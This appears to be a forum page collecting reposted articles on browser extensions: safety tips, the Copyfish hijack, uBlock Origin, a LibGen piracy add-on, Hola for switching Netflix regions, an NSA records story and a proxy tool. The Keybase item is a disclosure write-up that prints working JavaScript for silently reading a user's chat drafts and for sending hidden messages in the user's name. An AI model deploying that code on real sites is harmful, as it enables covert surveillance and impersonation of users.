from malicious Chrome extensions is to choose what you download carefully and only use extensions from trusted sources, whether you're in the Chrome Web Store or getting an extension from a specific developer. It’s also important to check what permissions each extension asks for when you install it, to make sure there’s nothing strange in the list, like a calculator tool that wants access to your webcam. And regularly review the list of Chrome extensions you have installed by going to “Window” and then “Extensions,” so you can catch anything you don’t want and use that has snuck in. Google says that more people are using Chrome extensions than ever, which makes sense, because they're convenient and useful. But don't go nuts downloading every weather tracker and emoji generator out there. There's a lot more at stake than you might think. source
  15. Need to pick the brains of someone that knows how to spot anything malicious in extension source files.Just an FYI - The extension has been developed by a Russian and most of the JScript files are in that language.Extension - Twitch 5 PlayerSource files.The player somehow blocks the newly implemented Twitch.tv ads. Something ad blockers apparently cannot do.
  16. Encrypt the web! HTTPS Everywhere is a extension to protect your communications by enabling HTTPS encryption automatically on sites that are known to support it. Homepage Changelog: Firefox 2017.10.24 / Chrome 2017.10.24 * Significant code refactor * Fixes for Fennec * Ruleset updates Download for Firefox https://www.eff.org/files/https-everywhere-2017.10.24-eff.xpi Download for Chrome, Chromium, and Opera 15+ Note: If you install the standalone .crx (i.e. not from the Chrome Web Store), and you are using Windows, Chrome will automatically disable the extension on each restart. You may be able to work around by using developer mode. See this issue. =
  17. Yesterday, I discovered that Keybase has a browser extension for both Firefox and Chrome. It activates whenever you land on a profile page on keybase.io, or a website which Keybase uses for proofs (currently Reddit, Twitter, Facebook, Github, Hacker News). It places a “Keybase Chat” button on the page. When you press this button, a compose window opens, you enter a message, and then the addon contacts your keybase desktop app in order to send a message to that user. If you are lucky enough to discover the extension by visiting https://keybase.io/docs/extension and by actually reading the content of the page, you will come across this little bit of information: The Keybase extension uses a compose box inside your browser. If you fear your browser or the social network site’s JavaScript has been compromised – say by another extension or even the social network acting fishy – then just compose the message inside the Keybase app directly. Or send a quick hello note through the extension and save the jucier private details for inside the app. This information is not on the Firefox or Chrome extension stores. But what does it actually mean? It means that Reddit, Twitter, Facebook, Github, Hacker News, Keybase and any other site that they allow to execute JavaScript on their pages can perform the following actions if you visit their websites with the addon installed: Read any message that you type into the compose box, as you’re typing it. Send chat messages from you to other Keybase users. For #1, to read the messages you are composing they simply need to serve up a small amount of JavaScript similar to the following when you visit: if (document.querySelector('.keybase-chat')) { let msg = ''; setInterval(() => { const t = document.querySelector('.keybase-reply textarea'); if (!t || t.value.length === 0 || t.value === msg) return; msg = t.value; fetch('/report-keybase-chat?msg=' + encodeURIComponent(msg)); }, 1000); } In the above code, the first line detects if the user has the keybase addon. If they do, it runs a check on a 1 second interval to see if there is a Keybase composer window open with a message in it. If there is, and the message being composed is different to what it was 1 second ago, then an ajax request is performed to send the content of that message to the server. For #2, to send a message to a keybase user silently: function sendKeybaseMessage(msg) { const s = document.createElement('style'); s.type = 'text/css'; s.textContent = '.keybase-reply{opacity:0 !important}'; document.head.appendChild(s); document.querySelector('.keybase-chat').click(); document.querySelector('.keybase-reply textarea').value = msg; const event = new UIEvent('change', { view: window, bubbles: true, cancelable: true }); document.querySelector('.keybase-reply textarea').dispatchEvent(event); document.querySelector('.keybase-reply input[name="keybase-submit"]').click(); document.querySelector('.keybase-close').click(); s.remove(); } The “style” related code is there to make sure that the user doesn’t notice the compose window opening and being filled with a message, and the message being sent, by making it invisible temporarily. To specify a recipient other than the one in the profile being viewed, a little more work would need to be done by the server to temporarily redirect you to a different profile page, but it would work. The troubling thing is, they could actually have made this secure. As well as the chat functionality that they inject into the browsers DOM, they also add a Keybase icon into the browser UI it’s self, outside of the DOM. Clicking on that icon works exactly the same, except it doesn’t inject anything into the DOM, the compose window is outside of the webpage, making it obvious that the browser is in control rather than the webpage. The textarea can not be read and it can not be interacted with from JavaScript. Conclusion : Continue installing and using the excellent desktop app. Don’t even think about installing the browser addon. Article source
  18. On Friday, an unknown hacker hijacked the Copyfish Chrome extension from its original authors and pushed an update that inserted ads in people's web pages. The hack took place because one of the Copyfish developers fell for a simple phishing trick and accessed a link in an email he thought he received from the Chrome team. In reality, the email came from the phisher and urged the Copyfish developer to update his extension, or it would be removed from the Chrome Web Store. Developer fell for simple phishing trick When the developer accessed the link, he was redirected to a copy of the Google account login page, where the Copyfish dev entered the credentials of the Copyfish developer account. The login page was hosted on chromedev.freshdesk.com, and surprisingly the extension's developer didn't think it was strange, even if Google has hosted its support desks on its own domains for more than a decade. Phishing page that fooled the Copyfish developers [Source: A9t9] On Saturday, a day later, the hacker had pushed a malicious update (v2.8.5) for the Chrome Copyfish extension, which a pretty powerful tool for extracting text from images and PDF files. Malicious update inserted ads in people's browsers The update added extra JavaScript code that loaded ads on all the pages a user viewed. Despite this intrusive behavior, it took Copyfish developers a full day to realize what had happened. Unfortunately, by that point, the hacker had transferred the extension to his own developer account, out of the reach of the original authors, who were desperately trying to reach a Google staffer to have the extension pulled down. On Monday, a post-mortem blog post published by the Copyfish team reached the Hacker News news aggregator service. This extra exposure helped the Copyfish team get in contact with Google employees but also contributed to stopping the hijacked extension's adware behavior after the owner of the Unpkg CDN service had taken down malicious JavaScript files used by the extension. At the time of writing, the extension is still under the hijacker's control. Users are advised to remove it from their browsers. The Copyfish team says its Firefox add-on is safe and under their control. Article source
  19. The WebExtension version of the popular content blocker uBlock Origin has landed on Mozilla's official Add-ons website for the Firefox web browser. A big upcoming shift from legacy add-ons to WebExtensions forces add-on developers to port their legacy add-ons to ensure compatibility with Firefox 57 and newer versions of the browser. Mozilla plans to cut off legacy support in Firefox 57 Stable which means essentially that add-ons that are not WebExtensions by the time won't work anymore in the web browser. Legacy add-on developers face three major issues: first that Mozilla is still working on WebExtension APIs, second that WebExtensions will be limited in what developers can do with them when compared to legacy add-ons, and third that it is just a couple of months before the switch happens. uBlock Origin WebExtension on Firefox AMO Work on a WebExtension version of uBlock Origin began back in October 2016. The extension was released on GitHub back then which meant that it was not signed at that point in time. Users who were interested in the new version were only able to install it as a temporary add-on. Good for testing, but not really practicable for every day use. The move to being distributed through Mozilla's official add-on repository takes care of the issue. The WebExtension version of uBlock Origin is available on the development channel on AMO currently. Firefox users who want to install the extension can do so in the following way: Advertisement Load the official uBlock Origin page on the Mozilla website. Scroll down on the page until you find the Development Channel section on it. Click on Development Channel to expand it. Either click directly on the "add to Firefox" link to install the latest build -- which is the WebExtension version of uBlock Origin", or click on "see complete development channel history" to list previous versions as well. Note: Existing uBlock Origin users will notice a delay during the process. This is caused by the importing of data from legacy storage to WebExtension storage. The process may take up to five minutes. The legacy storage won't be touched during the process so that it is possible to return to the legacy extension at a later point in time. The WebExtension storage will be deleted however when you uninstall the uBlock Origin WebExtension. Other things worth noting are: The new version is a hybrid extension right now. It will show up as legacy in about:addons. script:contains filter do not work. cosmetic filters are limited as the browser's user styles cannot be used for that anymore. Users who are on the "legacy" dev channel will notice that the "dev channel will cease to work". These users need to install the new version manually it appears. Closing Words The publication of the WebExtension version of uBlock Origin on Mozilla AMO marks the next step in the development of the new version of the popular add-on for Firefox. There is work to be done for sure, but Gorhill still has several months before the change hits Firefox. The first version is less powerful right now than the current legacy add-on version for Firefox. Most Firefox users may want to stick with the legacy add-on version for now because of that. Article source
  20. uBlock Origin is a popular cross-browser content blocker that is seen by many as one of the most efficient extensions of its kind. The browser extension is available for Firefox and Chromium based browsers, as well as Microsoft Edge. Basically, what that means is that you can install it in virtually any browser out there right now -- with the exception of Internet Explorer. The extension was initially known as uBlock -- originally named with the Greek letter µ instead of u -- and released for Google Chrome. The The uBlock project was forked in 2015, and Raymond Hill, the creator of uBlock, started work on uBlock Origin instead. One of the issues that came out of the split was that Chris Aljoudi, the person who forked uBlock, created the website ublock.org. This website asks for donations to cover "bandwidth costs" and to support "the project". Raymond Hill confirmed however that the site and the donations that it collects are not related to the official uBlock Origin project, and that the money does not benefit the development of the extension in any way. BEWARE! uBlock Origin is COMPLETELY UNRELATED to the web site ublock.org The donations sought by the individual behind ublock.org ("to keeps uBlock development possible", a misrepresentation) are not benefiting any of those who contributed most to create uBlock Origin (developers, translators, and all those who put efforts in opening detailed issues). The site ranks well in search engines, and it is likely that some users will land on it when they search for uBlock Origin or extensions to block advertisement or content on the Internet. uBlock Origin: official repository and downloads This article has been created to provide all users with a list of official resources of the uBlock Origin project. uBlock Origin official repository -- This is the official project repository of the uBlock Origin project on GitHub. It lists the code, changes, issues, and informational pages that provide users with information on specific features of uBlock Origin, and more. If you don't know where to start, this is the place to hit first. Google Chrome -- The official uBlock Origin Google Chrome Web Store page. Google Chrome manual -- You may install the latest version from the GitHub repository as well. Opera -- The official uBlock Origin Opera browser story page. Firefox -- The official Mozilla AMO listing of the add-on for Firefox. Firefox manual -- As is the case for Google Chrome, you may download the latest version of uBlock Origin for Firefox from the GitHub's project website as well. Microsoft Edge -- Note: the project is maintained by another developer. Edge users can download the extension fro the Microsoft Store. Microsoft Edge manual -- The latest development version of uBlock Origin for Edge can be installed from the project's GitHub page. Safari -- Note: the project is maintained by another developer. Safari users can download the development version from the GitHub project page. Note: If you don't find your web browser listed here, it may still be possible to install the extension. If it is based on Chromium, you may be able to install the Chrome extension, and if it is based on Firefox, the Firefox add-on may work in the browser. Article source
  21. With one of the largest eBook collections, Amazon is the place to shop for many paying readers. However, eBook pirates can now get their fix at the popular store too, via a new Chrome extension that places links to pirated copies into Amazon's pages. As one of the largest online retailers, Amazon is the go-to store for many people. Amazon became big by selling books and in recent years eBooks have become some of the fastest selling items. However, pirates are now directly targeting the company’s successful business model. With a new Chrome extension pirates are entering Amazon, effectively transforming it into a pirate ‘store.’ When the LibGen extension is installed, it adds a new row on top of the Amazon product page of books that are also available through unauthorized sources. The plugin uses data from the Libgen.org search engine which lists over a million books. Below is a screenshot of an Amazon book page, with a new row on the top linking to pirated downloads of the same title. LibGen, short for Library Genesis, lists a wide variety of pirate sources for most books, including direct downloads, torrents and magnet links. It appears to work well, although there are occasional mismatches where links to books with similar titles are listed. Needless to say book publishers are not going to be pleased with Amazon’s unofficial feature. Whether Amazon plans to take any action to stop the extension has yet to be seen. The idea to transform Amazon into a pirate site is not entirely new. A few years ago a Firefox plugin integrated Pirate Bay download links into the site, which also worked for music and movies. This plugin was quickly taken offline quickly after the news was picked up by the mainstream media. There are still other extensions floating around with the same functionality. Torrent This, for example, enhances Amazon with links to Pirate Bay download pages for all sorts of media, much like the “Pirates of the Amazon” plugin did. Source: TorrentFreak
  22. Update (New Version Thread) : http://www.nsaneforums.com/topic/223886-beta-adguard-extension-for-firefox-10212/ Homepage : http://blog.adguard.com/en/adguard-news/adguard-firefox-open-beta-test.html Download Link (For Firefox And Its Variants) : http://chrome.adtidy.org/app.html?app=main.xpi Download Link ( For Nightly Only) : http://www.mirrorcreator.com/files/GAGZPTIE/main-1.0.2.11.xpi_links How to install a beta version? 1. Download xpi file via the above link 2. Drag the downloaded file to Firefox. This Is The Extension Only For Firefox Browers, For Full Program Go Here : http://adguard.com/en/download.html
  23. There are a number of different ways to do this, but when you get down to it all they all do the same thing, which is change your IP address so it looks like you’re in another country. Some use proxy servers, others use VPNs, and there are hundreds of different options in each category. But arguably the easiest way to unblock movies on Netflix and take a peek at what’s available in other regions is to install a browser extension called Hola. Here’s a quick rundown of how to do it: Download and install Hola for your browser of choice and complete the free sign up process if you’re prompted to. Head over to Netflix. (Everything should look the same). Click on the Hola icon (looks like a flaming smiley face) and change your location to a different country of your choice. Refresh and the selection should include a bunch of new movies and TV shows you didn’t previously have access to.Enjoy...
  24. The U.S. National Security Agency has been allowed to continue to collect phone records in bulk of people in the country, while lawmakers consider new legislation that would block the agency from collecting the data. The government's application for reauthorization of the program for a period of 90 days was approved by the Foreign Intelligence Surveillance Court (FISC), according to a joint statement Friday by the Department of Justice and Office of the Director of National Intelligence. The government argued that it was seeking the extension as the relevant legislation has not been enacted yet. The bulk collection of phone metadata in the U.S. by the NSA was first disclosed in June last year by former agency contractor, Edward Snowden, through news outlets. In the wake of criticism of the surveillance program, President Barack Obama proposed in January changes in the program, including requiring that the government should not collect or hold the data in bulk, and deciding that, except in an emergency situation, the FISC will have to approve any queries to the phone records database. Obama also decided that the government should pursue phone calls that are two-steps removed from a number associated with a terrorist group, instead of the three hops previously authorized. In March, Obama said that the data should remain with the telephone companies, but said that Congress would have to pass the appropriate legislation. The U.S. Freedom Act, which was passed in May by the U.S. House of Representatives, addresses issues relating to access to phone records by the NSA. It now awaits consideration by the Senate. The version of the bill that was passed by the House has loopholes that could end with the NSA having the authority to continue to access phone data in bulk, according to civil rights groups. Groups like the Electronic Frontier Foundation are, for example, concerned about the new definition of "specific selection term," which describes and limits who or what the NSA is allowed to monitor. (Originally defined in the legislation as "a term used to uniquely describe a person, entity, or account," the expression is now defined as referring to "a discrete term, such as a term specifically identifying a person, entity, account, address, or device." The broader definition could allow for the use of broad selection terms such as a "zip code, an area code, the physical address of a particular email provider or financial institution, or the IP address of a web hosting service that hosts thousands of web sites," Kevin Bankston, policy director of the New America Foundation's Open Technology Institute, wrote in May. The Obama administration had backed the passing of the bill by the House in its diluted form, though some tech companies said they could not support the legislation as it had loopholes. The groups are now hoping that the Senate will restore the legislation to its previous form, particularly on the selection term for searches. The joint statement by the DOJ and ODNI urged the Senate to swiftly consider the legislation, adding that the administration remains ready to work with Congress to clarify that the bill prohibits bulk collection. The new reauthorization of bulk collection under Section 215 of the Patriot Act expires on Sept. 12. The court has previously reauthorized the program and its decisions were declassified and made public since the Snowden revelations. Source
  25. Webproxy for Google Chrome™ unblocks any website and secures your browsing http://webproxy.net Chrome extension: https://chrome.google.com/webstore/detail/webproxynet/mpmikmnnnoacchojfpdgfdgpkfgajhim Features: ✔ Unblock Netflix, Facebook, Youtube, Spotify ✔ Unblock country restricted websites ✔ Unblock torrent websites ✔ Surf anonymously ✔ Add websites to automatically open in proxy ✔ Proxify specific links on a website ✔ 100% SECURE ✔ 100% FREE ✔ REGISTRATION FREE Interesting extension. Any reviews? B)
×
×
  • Create New...